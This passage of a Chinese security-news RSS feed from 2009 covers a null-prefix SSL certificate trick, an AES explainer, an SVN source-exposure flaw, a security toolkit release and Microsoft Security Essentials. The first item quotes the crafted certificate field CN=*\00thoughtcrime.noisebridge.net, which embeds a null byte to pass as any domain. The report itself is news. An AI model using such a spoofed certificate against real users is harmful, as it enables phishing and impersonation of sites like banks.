<span class="readmore"><a href="http://osss.cn/news/2009/10/01/%e9%80%9a%e8%bf%87ssl%e8%ae%a4%e8%af%81%e7%9a%84%e6%8a%8a%e6%88%8f%e8%a2%ab%e5%85%ac%e5%b8%83/" title="通过SSL认证的把戏被公布">阅读全文——共591字</a></span>]]></description>
			<content:encoded><![CDATA[<p>在<a href="https://www.noisebridge.net/wiki/Noisebridge">Noisebridge</a>的黑客邮件列表中，安全专家<a href="http://www.appelbaum.net/">Jacob Appelbaum</a>公布了一个SLL认证书和相关的私钥，这样在脆弱的浏览器下，不管是不是该认证的提交域，都可以避免引起web服务器的警告。例如，网络钓鱼者，可以用这个认证来伪装他们的服务器作为合法的银行服务器，这样只有这个认证被严密的检查才回被发现。</p>
<p>在他的把戏中，根据Moxie Marlinspike在黑帽会议上说明的方法，Appelbaum修改域名中间0字符，像Marlinspike的<a href="http://thoughtcrime.org/">thoughtcrime.org</a>域名，Applelbaum输入*\00thoughtcrime.noisebridge.net,这样可以为任意的域名创建一个有效的通配符：</p>
<p>CN= *\00thoughtcrime.noisebridge.net</p>
<p>OU = Moxie Marlinspike Fan Club</p>
<p>O = NoisebridgeL = San Francisco</p>
<p>T = CaliforniaC = US</p>
<p>首次由heise Security小组测试，其公司在德国，试图在脆弱的浏览器中访问域名时没有引起警告。现在流行的浏览器为了阻止这样的把戏，也进行了相应的升级。其他的产品和构架需要提供SSL认证的的服务器也得到了相应更新。因此Appelbaum公开的发布‘Internet certificate’没有引起任何问题。专家说这个认证允许开发者来测试他们程序的安全性。</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/10/01/%e9%80%9a%e8%bf%87ssl%e8%ae%a4%e8%af%81%e7%9a%84%e6%8a%8a%e6%88%8f%e8%a2%ab%e5%85%ac%e5%b8%83/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>指引向AES的线条画</title>
		<link>http://osss.cn/news/2009/09/28/%e6%8c%87%e5%bc%95%e5%90%91aes%e7%9a%84%e7%ba%bf%e6%9d%a1%e7%94%bb/</link>
		<comments>http://osss.cn/news/2009/09/28/%e6%8c%87%e5%bc%95%e5%90%91aes%e7%9a%84%e7%ba%bf%e6%9d%a1%e7%94%bb/#comments</comments>
		<pubDate>Mon, 28 Sep 2009 04:31:37 +0000</pubDate>
		<dc:creator>雪山の小兔</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[趣闻]]></category>
		<category><![CDATA[AES]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=2126</guid>
		<description><![CDATA[软件工程师和加密迷Jeff Moser创作了一副线条画来解释高级加密标准（Advanced Encryption Standard，AES）：它从哪里来，为什么它是必须的，还有最具启发性的——它是如何工作的。当它经历一些数学计算时，你的眼睛可能会因此发光——就算你掠过了这部分，你也会了解很多关于过去你曾做过的加密。

]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;"><img class="size-full wp-image-2127 aligncenter" title="AES" src="http://osss.cn/news/wp-content/uploads/2009/09/AES.png" alt="AES" width="280" height="270" />软件工程师和加密迷Jeff Moser创作了一副<a href="http://www.moserware.com/2009/09/stick-figure-guide-to-advanced.html">线条画</a>来解释高级加密标准（Advanced Encryption Standard，AES）：它从哪里来，为什么它是必须的，还有最具启发性的——它是如何工作的。当它经历一些数学计算时，你的眼睛可能会因此发光——就算你掠过了这部分，你也会了解很多关于过去你曾做过的加密。</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/09/28/%e6%8c%87%e5%bc%95%e5%90%91aes%e7%9a%84%e7%ba%bf%e6%9d%a1%e7%94%bb/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>在SVN中发现严重的弱点</title>
		<link>http://osss.cn/news/2009/09/27/%e5%9c%a8svn%e4%b8%ad%e5%8f%91%e7%8e%b0%e4%b8%a5%e9%87%8d%e7%9a%84%e5%bc%b1%e7%82%b9/</link>
		<comments>http://osss.cn/news/2009/09/27/%e5%9c%a8svn%e4%b8%ad%e5%8f%91%e7%8e%b0%e4%b8%a5%e9%87%8d%e7%9a%84%e5%bc%b1%e7%82%b9/#comments</comments>
		<pubDate>Sat, 26 Sep 2009 16:47:52 +0000</pubDate>
		<dc:creator>雪山の小兔</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[svn]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=2044</guid>
		<description><![CDATA[来自Smashing Magazine的消息：“几个月前，Anton Isaykin和2comrades公司合作时，发现了大型项目中应用SVN的巨大弱点。经测试，他们获得了大概3320个俄文网站和主要的英文网站的文件结构甚至源代码。这个严重的弱点怕是不止存在一天两天的了。每个严重或者可见的问题一旦发现就会被修复。不过这里我们将会展示一些简单平常但是却十分危险的事物。” 详情

]]></description>
			<content:encoded><![CDATA[<p>来自Smashing Magazine的消息：“几个月前，Anton Isaykin和2comrades公司合作时，发现了大型项目中应用SVN的<a href="http://www.smashingmagazine.com/2009/09/25/svn-strikes-back-a-serious-vulnerability-found/">巨大弱点</a>。经测试，他们获得了大概3320个俄文网站和主要的英文网站的文件结构甚至源代码。这个严重的弱点怕是不止存在一天两天的了。每个严重或者可见的问题一旦发现就会被修复。不过这里我们将会展示一些简单平常但是却十分危险的事物。” <a href="http://www.smashingmagazine.com/2009/09/25/svn-strikes-back-a-serious-vulnerability-found/">详情</a></p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/09/27/%e5%9c%a8svn%e4%b8%ad%e5%8f%91%e7%8e%b0%e4%b8%a5%e9%87%8d%e7%9a%84%e5%bc%b1%e7%82%b9/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>“网络安全工具箱”进行了全面检修</title>
		<link>http://osss.cn/news/2009/09/24/%e2%80%9c%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%b7%a5%e5%85%b7%e7%ae%b1%e2%80%9d%e8%bf%9b%e8%a1%8c%e4%ba%86%e5%85%a8%e9%9d%a2%e6%a3%80%e4%bf%ae/</link>
		<comments>http://osss.cn/news/2009/09/24/%e2%80%9c%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%b7%a5%e5%85%b7%e7%ae%b1%e2%80%9d%e8%bf%9b%e8%a1%8c%e4%ba%86%e5%85%a8%e9%9d%a2%e6%a3%80%e4%bf%ae/#comments</comments>
		<pubDate>Thu, 24 Sep 2009 02:43:51 +0000</pubDate>
		<dc:creator>雪山の小兔</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[综合评论]]></category>
		<category><![CDATA[NST]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=1885</guid>
		<description><![CDATA[网络安全工具箱（Network Security Toolkit，NST），是一个拥有很多安全工具的live光盘，它的最新可用版本为2.11.0。版本升级的大部分工作集中在安装和更新机制。NST 2.11.0包所有系统和网络安全应用程序以PRM的形式保存在在线仓库中，因此你可以使用指令来安装它们：

yum

因为系统使用的是一个传输文件系统，所以它支持实时安装。新增加的nsttraceroute，地理编码脚本通过traceroute以KML格式输出，谷歌earth因此可以读取它。另外两个网络内容捕获应用：driftnet和tcpxtract。前者用来获取网页上的图像，后者用来获取PDF和微软Word文档。更多包版本的信息都可以在NST manifest中看到。

<span class="readmore"><a href="http://osss.cn/news/2009/09/24/%e2%80%9c%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%b7%a5%e5%85%b7%e7%ae%b1%e2%80%9d%e8%bf%9b%e8%a1%8c%e4%ba%86%e5%85%a8%e9%9d%a2%e6%a3%80%e4%bf%ae/" title="“网络安全工具箱”进行了全面检修">阅读全文——共392字</a></span>]]></description>
			<content:encoded><![CDATA[<p>网络安全工具箱（Network Security Toolkit，NST），是一个拥有很多安全工具的live光盘，它的最新可用版本为2.11.0。版本升级的大部分工作集中在安装和更新机制。NST 2.11.0包所有系统和网络安全应用程序以PRM的形式保存在在线仓库中，因此你可以使用指令来安装它们：<br />
<em>yum</em><br />
因为系统使用的是一个传输文件系统，所以它支持实时安装。新增加的<em>nsttraceroute</em>，地理编码脚本通过traceroute以KML格式输出，谷歌earth因此可以读取它。另外两个网络内容捕获应用：driftnet和tcpxtract。前者用来获取网页上的图像，后者用来获取PDF和微软Word文档。更多包版本的信息都可以在NST <a href="http://www.networksecuritytoolkit.org/nst/log/manifest-2.11.0.html">manifest</a>中看到。<br />
NST 2.11.0基于Fedora 11，可以通过DVD和USB来引导启动。它还带有一个虚拟机。读者可以到项目<a href="http://www.networksecuritytoolkit.org/nst/welcome.html">主页</a>上下载到镜像文件。</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/09/24/%e2%80%9c%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%b7%a5%e5%85%b7%e7%ae%b1%e2%80%9d%e8%bf%9b%e8%a1%8c%e4%ba%86%e5%85%a8%e9%9d%a2%e6%a3%80%e4%bf%ae/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>微软即将发布免费安全软件</title>
		<link>http://osss.cn/news/2009/09/22/%e5%be%ae%e8%bd%af%e5%8d%b3%e5%b0%86%e5%8f%91%e5%b8%83%e5%85%8d%e8%b4%b9%e5%ae%89%e5%85%a8%e8%bd%af%e4%bb%b6/</link>
		<comments>http://osss.cn/news/2009/09/22/%e5%be%ae%e8%bd%af%e5%8d%b3%e5%b0%86%e5%8f%91%e5%b8%83%e5%85%8d%e8%b4%b9%e5%ae%89%e5%85%a8%e8%bd%af%e4%bb%b6/#comments</comments>
		<pubDate>Mon, 21 Sep 2009 17:32:04 +0000</pubDate>
		<dc:creator>雪山の小兔</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[软件]]></category>
		<category><![CDATA[security essentials]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=1790</guid>
		<description><![CDATA[在周日的电子邮件里，微软感谢了beta测试人员的帮助，并说这个微软Security Essentials的完美版本将会在接下来的几个星期里发布。微软还鼓励beta测试员更新到最新的测试软件，以便让最终的版本转变能更加平稳。

在六月的时候，微软将它的Security Essentials beta版本提供了大约75,000用户，但是当达到目标时就迅速切断了供应。

微软的对这款软件的目标是作为一个基本的防病毒防木马的产品，比像Symantec和McAfee这些供应商提供的安全软件，不过微软的这款安全软件将消耗更少的内存，占据更少的磁盘空间。

<span class="readmore"><a href="http://osss.cn/news/2009/09/22/%e5%be%ae%e8%bd%af%e5%8d%b3%e5%b0%86%e5%8f%91%e5%b8%83%e5%85%8d%e8%b4%b9%e5%ae%89%e5%85%a8%e8%bd%af%e4%bb%b6/" title="微软即将发布免费安全软件">阅读全文——共325字</a></span>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-1791" title="windows logo" src="http://osss.cn/news/wp-content/uploads/2009/09/windows-logo.jpg" alt="windows logo" width="100" height="100" />在周日的电子邮件里，微软感谢了beta测试人员的帮助，并说这个微软Security Essentials的完美版本将会在接下来的几个星期里发布。微软还鼓励beta测试员更新到最新的测试软件，以便让最终的版本转变能更加平稳。<br />
在六月的时候，微软将它的Security Essentials beta版本提供了大约<a href="http://www.computerworld.com/s/article/9134680/Microsoft_caps_free_security_software_downloads">75,000</a>用户，但是当达到目标时就迅速切断了供应。<br />
微软的对这款软件的目标是作为一个基本的<a href="http://www.computerworld.com/s/article/9134556/Microsoft_to_deliver_free_antimalware?">防病毒防木马</a>的产品，比像Symantec和McAfee这些供应商提供的安全软件，不过微软的这款安全软件将消耗更少的内存，占据更少的磁盘空间。</p>
<p>名词解释  beta:</p>
<p>1、 测试第二版</p>
<p>2、在软件测试领域，beta测试是邀请用户体验参加的测试方式。</p>
<p>在文中，为第二种解释</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/09/22/%e5%be%ae%e8%bd%af%e5%8d%b3%e5%b0%86%e5%8f%91%e5%b8%83%e5%85%8d%e8%b4%b9%e5%ae%89%e5%85%a8%e8%bd%af%e4%bb%b6/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
